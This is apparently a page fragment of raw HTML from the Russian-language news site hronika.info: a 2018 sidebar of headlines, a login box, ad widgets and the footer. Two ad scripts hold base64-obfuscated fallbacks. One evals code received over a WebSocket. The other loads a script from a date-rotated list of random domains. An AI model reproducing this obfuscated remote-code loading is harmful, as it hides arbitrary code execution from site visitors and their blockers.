		<div class="b-new-author"><a onclick="ShowProfile('%D0%A2%D0%B0%D1%80%D0%B0%D1%81+%D0%A7%D0%BE%D1%80%D0%BD%D0%BE%D0%B2%D0%B8%D0%BB', 'http://hronika.info/user/%D0%A2%D0%B0%D1%80%D0%B0%D1%81+%D0%A7%D0%BE%D1%80%D0%BD%D0%BE%D0%B2%D0%B8%D0%BB/', '0'); return false;" href="http://hronika.info/user/%D0%A2%D0%B0%D1%80%D0%B0%D1%81+%D0%A7%D0%BE%D1%80%D0%BD%D0%BE%D0%B2%D0%B8%D0%BB/">Тарас Чорновил</a></div>
    	<strong><a href="http://hronika.info/mnenia/323846-chto-timoshenko-obsuzhdala-v-varshave-s-saakashvili.html">Что Тимошенко обсуждала в Варшаве с Саакашвили</a></strong>			
</div>
				</div>
                <div class="vsenovosti" title="Мнения, рассуждения, аналитика"><a href="/mnenia/">Читать все мнения</a></div>
			</div>
  

	<div class="hrap" >
            	﻿


 <div class="fleft authbut"><a class="alert4">Авторизация</a></div> 
 <div class="fright authbut"><a rel="nofollow" href="/index.php?do=register">Регистрация</a></div>
 <div class="clr"></div>
<div id="dim4">
<div class="msgbox">
<div class="msgboxttl"><span></span>Вход на сайт<a class="close">X</a></div>
 		<form method="post" action="#">
				<div id="logentform"><span></span>
                <div class="msgbox_ent">Войти используя учетную запись хроники</div>
					<ul class="reset">
						<li class="logfield"><label for="login_name">Введите E-Mail:</label><input type="text" name="login_name" id="login_name" /></li>
						<li class="logfield"><label for="login_password">Введите Пароль :</label><input type="password" name="login_password" id="login_password" />&nbsp;(<a id="zabyli" href="http://hronika.info/index.php?do=lostpassword">Забыли?</a>)</li><br />
						<li class="zapomnit"><input type="checkbox" name="login_not_save" id="login_not_save" value="1"/><label for="login_not_save">&nbsp;Запомнить меня</label><button onclick="submit();" type="submit" title="Войти">Войти</button></li>
					</ul>
					<input name="login" type="hidden" id="login" value="submit" />
                    <div id="logreg"><a rel="nofollow" href="/index.php?do=register">Зарегистрироваться</a></div>
				</div> 
			</form>
            
            
 <div class="sotsenter">
	
	
	
	
	
	
 </div>

    <div class="clr h40"></div>
 <div class="clr msgbox_b"></div>
       </div>
    </div>

    </div>

    <div class="wrap"> 
    <!-- noindex -->
<div id='kurs-com-ua-informer-main-ukraine-300x130-blue-container'><a href="//old.kurs.com.ua/informer" id="kurs-com-ua-informer-main-ukraine-300x130-blue" title="Курс валют информер Украина" rel="nofollow" target="_blank">Информер курса валют</a></div>
<script type='text/javascript'>
(function() {var iframe = '<ifr'+'ame src="//old.kurs.com.ua/informer/inf2?color=blue" width="300" height="130" frameborder="0" vspace="0" scrolling="no" hspace="0"></ifr'+'ame>';var container = document.getElementById('kurs-com-ua-informer-main-ukraine-300x130-blue');container.parentNode.innerHTML = iframe;})();
</script>
<noscript><img src='//old.kurs.com.ua/static/images/informer/kurs.png' width='52' height='26' alt='kurs.com.ua: курс валют в Украине!' title='Курс валют' border='0' /></noscript>
<!--/ noindex -->    
        
    <div class="wrap">
        
    </div>
        
          
    <div class="wrap">
            	<h3>Новости сегодня</h3>
<div id="FMg6hQON63UZxhcgPUb0" data-type="0" class="blockOfO1b2l3" ></div>

<script id="r17725" type="text/javascript">
    (function() {
        var worker17725,
            tickerID = 17725,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17725.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17725.postMessage(data);
                }

                worker17725 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17725.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17725.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>



    </div>
        

              		<div id="poisk">
					<form method="post" action='#'>
						<input type="hidden" name="do" value="search" />
						<input type="hidden" name="subaction" value="search" />
						<input id="story" name="story" value="Введите поисковый запрос" onblur="if(this.value=='') this.value='Введите поисковый запрос';" onfocus="if(this.value=='Введите поисковый запрос') this.value='';" type="text" />
                        <input  alt="найти" type="image" src="/templates/hronika/images/poisk.png" />
					</form>
				</div>
			</div>
             
           
                       
            <div class="wrap bshadow">
				<h3 class="inbg">Самое интересное за неделю</h3> 				

<div id="ax_popular_obs">
	<ul class="tabs tshadow ax_tabs" style="height: 25px;">
		<li title="Обсуждаемое"><a href="#ax_obs">Обсуждаемое</a></li>
		<li title="Популярное"><a href="#ax_popular">Популярное</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_obs">
			 <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kriminal/323295-v-kieve-pogib-shkolnik-nazvany-detali.html"><span>05.06-20:32</span>
	<strong title="В Киеве погиб школьник: названы детали">В Киеве погиб школьник: названы детали</strong></a><b>6351</b><div class="category_lastn_date" title="Происшествия">&nbsp;&nbsp;<a href="http://hronika.info/kriminal/">Происшествия</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/323007-mer-ukrainskogo-goroda-moschnym-udarom-otpravil-aktivista-v-nokdaun-video.html"><span>04.06-18:48</span>
	<strong title="Мэр украинского города мощным ударом отправил активиста в нокдаун. Видео">Мэр украинского города мощным ударом отправил активиста в нокдаун. Видео</strong></a><b>4576</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/322417-kadry-raketnogo-udara-boevikov-dnr-po-poziciyam-vsu-video.html"><span>02.06-13:05</span>
	<strong title="Кадры ракетного удара боевиков «ДНР» по позициям ВСУ. Видео">Кадры ракетного удара боевиков «ДНР» по позициям ВСУ. Видео</strong></a><b>4083</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/324129-v-kieve-desyatki-kormyaschih-mam-ustanovili-neobychnyy-rekord-video.html"><span>08.06-19:47</span>
	<strong title="В Киеве десятки кормящих мам установили необычный рекорд. Видео">В Киеве десятки кормящих мам установили необычный рекорд. Видео</strong></a><b>234</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/324071-muraev-otvetil-na-obvineniya-v-gosizmene-video.html"><span>08.06-16:12</span>
	<strong title="Мураев ответил на обвинения в госизмене. Видео">Мураев ответил на обвинения в госизмене. Видео</strong></a><b>1169</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/324016-v-rade-podralis-nardepy-video.html"><span>08.06-13:40</span>
	<strong title="В Раде подрались нардепы. Видео">В Раде подрались нардепы. Видео</strong></a><b>1777</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/324000-chm-2018-v-rossii-vysmeyali-novoy-karikaturoy.html"><span>08.06-12:30</span>
	<strong title="ЧМ-2018 в России высмеяли новой карикатурой">ЧМ-2018 в России высмеяли новой карикатурой</strong></a><b>1626</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/mir/323985-dron-nasa-nashel-vozmozhnye-dokazatelstva-zhizni-na-marse.html"><span>08.06-11:54</span>
	<strong title="Дрон NASA нашел возможные доказательства жизни на Марсе">Дрон NASA нашел возможные доказательства жизни на Марсе</strong></a><b>1067</b><div class="category_lastn_date" title="Мир">&nbsp;&nbsp;<a href="http://hronika.info/mir/">Мир</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/obwestvo/323931-polzovateley-seti-vozmutilo-rossiyskoe-kafe-v-mariupole.html"><span>08.06-07:33</span>
	<strong title="Пользователей Сети возмутило "российское" кафе в Мариуполе">Пользователей Сети возмутило "российское" кафе в Мариуполе</strong></a><b>5207</b><div class="category_lastn_date" title="Общество">&nbsp;&nbsp;<a href="http://hronika.info/obwestvo/">Общество</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/323908-mediki-nazvali-dostupnoe-sredstvo-ochischeniya-mozga.html"><span>08.06-02:27</span>
	<strong title="Медики назвали доступное средство очищения мозга">Медики назвали доступное средство очищения мозга</strong></a><b>999</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div>
			
		</div>			
		<div id="ax_popular">
		   <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/322704-effektivnaya-letnyaya-dieta-dlya-stremitelnogo-pohudeniya.html"><span>03.06-16:15</span>
	<strong title="Эффективная летняя диета для стремительного похудения">Эффективная летняя диета для стремительного похудения</strong></a><b>32860</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/tehnologii/322658-google-unichtozhila-planshety-na-android.html"><span>03.06-13:10</span>
	<strong title="Google «уничтожила» планшеты на Android">Google «уничтожила» планшеты на Android</strong></a><b>23677</b><div class="category_lastn_date" title="Технологии">&nbsp;&nbsp;<a href="http://hronika.info/tehnologii/">Технологии</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/323463-nazvany-luchshie-letnie-diety-dlya-bystrogo-pohudeniya.html"><span>06.06-14:11</span>
	<strong title="Названы лучшие летние диеты для быстрого похудения">Названы лучшие летние диеты для быстрого похудения</strong></a><b>21284</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/323726-muzhchinam-na-zametku-nazvany-glavnye-vragi-potencii.html"><span>07.06-13:01</span>
	<strong title="Мужчинам на заметку: названы главные "враги" потенции">Мужчинам на заметку: названы главные "враги" потенции</strong></a><b>17752</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/322483-luchshie-anekdoty-na-vecher-subboty.html"><span>02.06-19:45</span>
	<strong title="Лучшие анекдоты на вечер субботы">Лучшие анекдоты на вечер субботы</strong></a><b>16696</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/323800-eti-pravila-pohudeniya-pomogut-stat-stroynymi-dazhe-lenivym.html"><span>07.06-16:44</span>
	<strong title="Эти правила похудения помогут стать стройными даже ленивым">Эти правила похудения помогут стать стройными даже ленивым</strong></a><b>15819</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/322863-eti-privychki-mogut-stat-prichinami-gormonalnogo-sboya.html"><span>04.06-10:49</span>
	<strong title="Эти привычки могут стать причинами гормонального сбоя">Эти привычки могут стать причинами гормонального сбоя</strong></a><b>14221</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/322645-svezhie-anekdoty-dlya-horoshego-nachala-leta.html"><span>03.06-12:05</span>
	<strong title="Свежие анекдоты для хорошего начала лета">Свежие анекдоты для хорошего начала лета</strong></a><b>10807</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/322318-vera-brezhneva-podelilas-fotografiey-v-interesnom-plate.html"><span>02.06-00:41</span>
	<strong title="Вера Брежнева поделилась фотографией в интересном платье">Вера Брежнева поделилась фотографией в интересном платье</strong></a><b>10255</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/323169-eks-glavar-boevikov-gubarev-nasmeshil-bolshim-hozyaystvom.html"><span>05.06-12:33</span>
	<strong title="Экс-главарь боевиков Губарев насмешил «большим хозяйством»">Экс-главарь боевиков Губарев насмешил «большим хозяйством»</strong></a><b>9863</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div>
		</div>			         
	</div>
</div>
 <div class="clr"></div>
 
					
</div>

            
  
          
          <div class="wrap">
              <div id="bn_9bfe796fdf">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.9bfe796fdf.js"></script>
              <h3>Интересные новости</h3>
              <!-- noindex --><div id="n4p_31957">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script><!--/ noindex -->
              <!--noindex-->
<!-- LentaInformNews Start -->
<div id="LentaInformScriptRootN14129" class="news-block-magick">
    <div id="LentaInformPreloadN14129">
                <a href="http://lentainform.com/" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN14129")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN14129");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=14129;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/h/r/hronika.info.14129.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- LentaInformNews End -->
<!--/noindex -->
              <!--noindex -->
<!-- MarketGidNews Start -->
<div id="MarketGidScriptRootN8362" class="news-block-magick">
    <div id="MarketGidPreloadN8362">
        <a id="mg_add8362" href="http://usr.marketgid.com/demo/celevie-posetiteli/" rel="nofollow" target="_blank"><img src="//cdn.marketgid.com/images/marketgid_add_link.png" style="border:0px"></a><br>        <a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN8362")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN8362");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=8362;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/h/r/hronika.info.8362.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- MarketGidNews End -->
<!--/noindex-->
              <div class="join_informer_3674" id="join_informer_3674"></div>

<!-- Асинхронный код, 10.02.2016 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "//partner.join.com.ua/async/3674/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->
             </div>		        
          
          
          <div class="wrap">
            	<h3>Мы в Фейсбук</h3>
              <!--noindex--><div class="fb-page" data-href="https://www.facebook.com/Hronika.info/" data-width="300" data-height="220" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/Hronika.info/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/Hronika.info/">Хроника мировых событий</a></blockquote></div><!--/noindex-->
			</div>
          
        
          <!--<div class="wrap">
            	<h3>Наш опрос</h3>
		        
			</div>
        -->
       
       		   </div>

            
  
                 
      </aside>
                      <div class="fullstory_bottom">
         <div class="bshadow">
		 
         <div class="clr"></div>
         </div>
      </div> 

        </section> 
      </div>
      <footer id="footer">
        <div class="maxw">			<nav class="footbut">
				<ul class="clr reset">
				    <li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/obwestvo/" >Общество</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/nedvizhimost/" >Недвижимость</a></li>	
					<li><a href="/videonovosti/" >Видеоновости</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>						
				</ul>					
				<ul class="clr reset">
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/kultura/" >Культура</a></li>					
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/medicina/" >Медицина</a></li>					
					<li><a href="/greenpeace/" >Гринпис</a></li>
				    <li><a href="/kriminal/" >Криминал</a></li>
					<li><a href="/igry/" >Игры</a></li>
					<li><a href="/videoigry/" >Видеоигры</a></li>					
				</ul>
			</nav>
            <a href="#"><img src="/templates/hronika/images/banners/footrekl.png" alt="Реклама" class="footrekl" /></a>
            <div class="clr5"></div>
            <div class="copyright_f"><p>Новостное интернет издание Хроника мировых событий - всегда только горячие и интересные новости со всей планеты. Все самые свежие события, происшествия, достижения и открытия мира освещаются на нашем сайте специально для вас. Копирование и использование информации с сайта Хроника инфо разрешается при условии прямой, открытой для поисковых систем гиперссылки на наш сайт. <span>hronika.info &copy; 2012-2018</span></p></div>
            <div class="counts">
            <nav class="footbut2">
            <ul class="clr5 reset">
              <li><a href="http://hronika.info/o-nas.html">О нас</a></li>
              <li><a href="http://hronika.info/sitemap.xml">Карта</a></li>
              <li><a href="http://hronika.info/vakansii.html">Вакансии</a></li>
              <li><a href="http://hronika.info/konakt.html">Контакты</a></li>
            </ul>   
            </nav>
            <!--noindex-->
              <div class="count"><!--noindex-->
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t18.12;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet-->
<!--/noindex--></div>
              <div class="count"></div>
              <div class="count"></div>
              <div class="count"></div>
            <!--/noindex--></div>
      </footer>
      <a href="#top" id="goTop" class="go-top"><img src="/templates/hronika/images/up.png" alt="наверх" title="Подняться наверх" /></a>
      
<!-- popup     
      <div class="news-bot-show">
        <div id="dim7">
          <div class="msgbox7">
            <div class="msgboxttl7">
              <b>Материалы в разделе&nbsp;

УКРАИНА


















</b>
              <a class="close7">X</a>
            </div>

<div class="vsplivayushee-okno">
    <span class="spandate">08.06-19:05</span>
	<strong title="На Донбассе в жилом доме нашли боеприпасы"><a href="http://hronika.info/ukraina/324122-na-donbasse-v-zhilom-dome-nashli-boepripasy.html">На Донбассе в жилом доме нашли боеприпасы</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">08.06-18:23</span>
	<strong title="В Авдеевке закачиваются запасы воды"><a href="http://hronika.info/ukraina/324115-v-avdeevke-zakachivayutsya-zapasy-vody.html">В Авдеевке закачиваются запасы воды</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">08.06-14:03</span>
	<strong title="В Крыму запретили посещать леса"><a href="http://hronika.info/ukraina/324025-v-krymu-zapretili-poseschat-lesa.html">В Крыму запретили посещать леса</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">08.06-13:10</span>
	<strong title="На Донбассе боевики укрепляют свои позиции, - ОБСЕ"><a href="http://hronika.info/ukraina/324008-na-donbasse-boeviki-ukreplyayut-svoi-pozicii-obse.html">На Донбассе боевики укрепляют свои позиции, - ОБСЕ</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">08.06-12:19</span>
	<strong title="Экс-охранник Януковича рассказал об обстреле кортежа беглого президента"><a href="http://hronika.info/ukraina/323992-eks-ohrannik-yanukovicha-rasskazal-ob-obstrele-kortezha-beglogo-prezidenta.html">Экс-охранник Януковича рассказал об обстреле</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">08.06-09:59</span>
	<strong title="Украинский Ан-26 перехватил российский ракетный корабль в Черном море"><a href="http://hronika.info/ukraina/323949-ukrainskiy-an-26-perehvatil-rossiyskiy-raketnyy-korabl-v-chernom-more.html">Украинский Ан-26 перехватил российский ракетный</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">08.06-09:17</span>
	<strong title="На Донбассе получили ранения четверо военнослужащих"><a href="http://hronika.info/ukraina/323937-na-donbasse-poluchili-raneniya-chetvero-voennosluzhaschih.html">На Донбассе получили ранения четверо</a></strong>			
</div>























            <hr />»
            <a href="/">Перейти на главную</a>
          </div>
        </div>
      </div>
-->
      
    <div id="fb-root"></div>
      <script type="text/javascript">	
$(document).ready(function(){$("#newstab2, #listalka_tab, #rightbl_tab, #ax_popular_obs, #ax_popular_comp").easyTabs({defaultContent:1})});$(document).ready(function(){$("#slider3").tinycarousel({pager:true,interval:true})});$(document).ready(function(){$("#dim7").css("height",$(document).height());$(".alert7").click(function(){$("#dim7").fadeIn();return false});$(".close7").click(function(){$(".news-bot-show").remove();return false})});$(window).bind("resize",function(){$("#dim7").css("height",$(window).height())});
$(document).ready(function(){$("div.short_2").addClass("alt");$("div.short_2_clr:even").addClass("alt")});
    </script>
<div id="fb-root"></div>

	<script type="text/javascript" src="/templates/hronika/js/libs.js"></script>
	<script type="text/javascript" src="/templates/hronika/js/orating_pack.js"></script>
        <!--[if IE]>
	<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
	<![endif]-->
	<!--[if IE 8]><link href="/templates/hronika/css/ie8.css"  rel="stylesheet" media="all" /><![endif]-->
<script>
(function(i,s,o,g,r,a,m){i["GoogleAnalyticsObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date;a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,"script","//www.google-analytics.com/analytics.js","ga");ga("create","UA-48298212-1","hronika.info");ga("send","pageview");
</script>

<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/ED9.js" ></script>
<div id="MIXADV_4430" class="MIXADVERT_NET"></div>
          <script> 
          var node4430 = document.getElementById("MIXADV_4430");
          if( node4430 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4430&r="+Math.random();
               node4430.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBkYXRlX251bWJlciA9IGRhdGUuZ2V0RGF0ZSgpIC0gMTt2YXIgbWFzID0gWyAiMXd3WVp4bnFNZy5zcGFjZSIsIndlOHg0OGh4ZzB4LmluZm8iLCIzYmxjdmpzamh5NS5pbmZvIiwiOWRrY3BweXhocy5zaXRlIiwiYmg4OWxxZnJkNTIuaW5mbyIsIjBhcWxvMmN0Zi5wcm8iLCJteXZ6dWM4Y3VtLnNpdGUiLCJwc2E5ZTljbzR0LnNwYWNlIiwiNnhwZHpiM2x2di5zaXRlIiwiWXVPNWxta2NWQy5zaXRlIiwibHAwemw2M253MzIuc2l0ZSIsIjJ6eWtpaXVncC5wcm8iLCJyYm1kbHZ1NXlnaS5zaXRlIiwiNXBwa3BmNHhweGIuc3BhY2UiLCJsNmhiYTdzb3NtMS5zaXRlIiwiZWo2YmVvd3VrenUuc3BhY2UiLCIyYTl6bDJ2OW4ucHJvIiwibndvazJpcXh2ZWwuc3BhY2UiLCJ4NGJ2emV1NzRqMS5zaXRlIiwidGpsZ2ZkZm5rLnRlY2giLCIyOGZhZXB0cTcudGVjaCIsInJybmhiODYzai50ZWNoIiwiYWs3MmV2aWljOW0uc2l0ZSIsImJrYmIzMTZmangzLnNwYWNlIiwiaWE3aWVrcXJuNXAuc2l0ZSIsIjJmNjFqdXB4ZHB2LnNwYWNlIiwieDl6eHEydXdqbXMuc2l0ZSIsImNxNDc1a2tubDd0aHpmLnRvcCIsImluaHo0OXhocGhhcjVrLnRvcCIsInM3c2R0Z3o3enJlNW1zLnRvcCIgXTtpZiggbWFzLmxlbmd0aCA8PSBkYXRlX251bWJlciApIHZhciBob3N0ID0gbWFzW01hdGguZmxvb3IoIGRhdGVfbnVtYmVyIC8gMiApXTsgZWxzZSB2YXIgaG9zdCA9IG1hc1tkYXRlX251bWJlcl07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgNSk7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDQ0MzAgKiBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIityK2RlbHRhK2lkKyIiOyBub2RlNDQzMC5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7") );
              }
          }
          </script> 
</body>

</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
